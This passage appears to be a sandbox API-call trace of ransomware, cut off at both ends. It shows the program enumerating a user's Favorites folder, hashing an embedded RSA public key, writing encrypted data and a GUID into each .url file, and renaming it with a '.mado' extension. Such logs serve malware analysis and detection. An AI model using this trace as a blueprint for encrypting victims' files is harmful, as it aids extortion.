lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0205.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0205.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.427] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.427] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.427] PathFindFileNameW (pszPath="") returned="" [0205.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.428] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.428] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0205.428] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0205.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.429] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.429] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.432] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.432] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.432] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.433] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.433] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.433] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.433] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.433] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.434] GetLastError () returned 0x0 [0205.434] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.434] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.434] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.434] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.434] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.434] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.434] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.434] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.434] CloseHandle (hObject=0x63c) returned 1 [0205.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.435] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.mado")) returned 1 [0205.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.436] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b3348 | out: hHeap=0x2c0000) returned 1 [0205.437] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0205.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.437] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0205.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.438] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.438] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.440] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.440] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.442] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.442] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.442] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.443] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.443] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.443] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.443] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.443] GetLastError () returned 0x0 [0205.443] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.443] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.443] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.443] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.443] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.443] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66270 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe820 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b662b8 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe838 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe868 [0205.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe868 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8b0 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe880 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe868 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 